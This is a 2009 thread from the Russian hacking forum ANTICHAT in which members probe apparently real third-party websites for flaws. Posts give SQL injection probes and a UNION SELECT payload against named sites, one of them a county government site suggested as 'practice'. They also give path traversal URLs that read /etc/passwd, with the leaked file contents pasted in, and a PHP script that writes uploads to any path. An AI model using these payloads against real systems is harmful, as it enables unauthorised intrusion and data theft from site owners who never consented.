HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8851  
Старый 06.09.2009, 23:01
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Цитата:
Сообщение от geforce  
Это уязвимость???

http://arbrand.ru/kat_pos.php?id=-1
пробуй логику если не уверен
http://arbrand.ru/kat_pos.php?id=1+and+1=1 и
http://arbrand.ru/kat_pos.php?id=1+and+1=0

ну и различные /* -- # если резултат ни какого изменения то не уязвимость =)

ЗЫ проверил , не пашет логика =)
 
Ответить с цитированием

  #8852  
Старый 06.09.2009, 23:06
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Shadrin, Max upload filesize ограничение скорей всего
 
Ответить с цитированием

  #8853  
Старый 06.09.2009, 23:12
Shadrin
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171

Репутация: 270
Отправить сообщение для Shadrin с помощью ICQ
По умолчанию

Цитата:
Сообщение от попугай  
Shadrin, Max upload filesize ограничение скорей всего
4 килобайта попробовал загурузить пофик
 
Ответить с цитированием

  #8854  
Старый 06.09.2009, 23:16
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от Shadrin  
4 килобайта попробовал загурузить пофик

Сервак на винде? Иногда там временная папка для аплоаденных файлов не задана или некорректно задана и php не может файл прочитать.


Попробуй создай php файл следующий

Цитата:

<?php if(isset($_POST[ok])){
if(copy($_FILES[fnm][tmp_name], $_POST[name]))
{
echo "<a href=" . $_POST[name] . ">Click</a>";
} else {
die("err");
}
}?><form method=post enctype=multipart/form-data><input type=text name=name><input type=file name=fnm><br> <input type=submit name=ok><br></form>
и им попробуй аплоаднуть.
 
Ответить с цитированием

  #8855  
Старый 06.09.2009, 23:18
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686

Репутация: -25
Отправить сообщение для geforce с помощью ICQ
Question

Цитата:
Сообщение от HAXTA4OK  
пробуй логику если не уверен
http://arbrand.ru/kat_pos.php?id=1+and+1=1 и
http://arbrand.ru/kat_pos.php?id=1+and+1=0

ну и различные /* -- # если резултат ни какого изменения то не уязвимость =)

ЗЫ проверил , не пашет логика =)
А вот это уязвимость???

http://arbrand.ru/index.php?id=info&razdel=zakon&stat=-1'
 
Ответить с цитированием

  #8856  
Старый 06.09.2009, 23:19
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

это дыра в пхп кодах Пхп иньекция
Вот тебе скуля
http://www.warrencountypa.net/current/com.php?ID=1
На ней практикуйся
 
Ответить с цитированием

  #8857  
Старый 06.09.2009, 23:22
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Цитата:
Сообщение от geforce  
А вот это уязвимость???

http://arbrand.ru/index.php?id=info&razdel=zakon&stat=-1'

это пхп инъекция

result :
http://arbrand.ru/index.php?id=info&razdel=zakon&stat=../../index.php%00

http://arbrand.ru/index.php?id=info&razdel=zakon&stat=../../../../../etc/passwd

PS жесткий прикол Новичок (7/-4) ± гринки 7 простой -4

Последний раз редактировалось HAXTA4OK; 06.09.2009 в 23:27..
 
Ответить с цитированием

  #8858  
Старый 07.09.2009, 00:00
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686

Репутация: -25
Отправить сообщение для geforce с помощью ICQ
Question

Цитата:
Сообщение от HAXTA4OK  
это пхп инъекция

result :
http://arbrand.ru/index.php?id=info&razdel=zakon&stat=../../index.php%00

http://arbrand.ru/index.php?id=info&razdel=zakon&stat=../../../../../etc/passwd

PS жесткий прикол Новичок (7/-4) ± гринки 7 простой -4
1 А бываю Flash Shell на action script написанные??

2 Что полезного моно от сюда извлечь????


Код:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news

Последний раз редактировалось geforce; 07.09.2009 в 00:05..
 
Ответить с цитированием

  #8859  
Старый 07.09.2009, 00:09
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686

Репутация: -25
Отправить сообщение для geforce с помощью ICQ
Question

Цитата:
Сообщение от [x60]unu  
это дыра в пхп кодах Пхп иньекция
Вот тебе скуля
http://www.warrencountypa.net/current/com.php?ID=1
На ней практикуйся
Это же вроде скрытая скула???http://www.warrencountypa.net/current/com.php?ID=-1
 
Ответить с цитированием

  #8860  
Старый 07.09.2009, 06:11
BlackSun
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

Цитата:
Сообщение от geforce  
Это же вроде скрытая скула???http://www.warrencountypa.net/current/com.php?ID=-1
Ты когда мозгами думать начнешь, а не тупо бежать задавать тупые вопросы в этой ветке?
_http://www.warrencountypa.net/current/com.php?ID=-1+union+select+1,concat_ws(0x3a,user(),version()), 3,4,5,6+--+

Цитата:
Сообщение от geforce  
1 А бываю Flash Shell на action script написанные??

2 Что полезного моно от сюда извлечь????


Код:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news
1. флеш исполняется на стороне юзера, нет
2. ничего

Последний раз редактировалось BlackSun; 07.09.2009 в 06:13..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ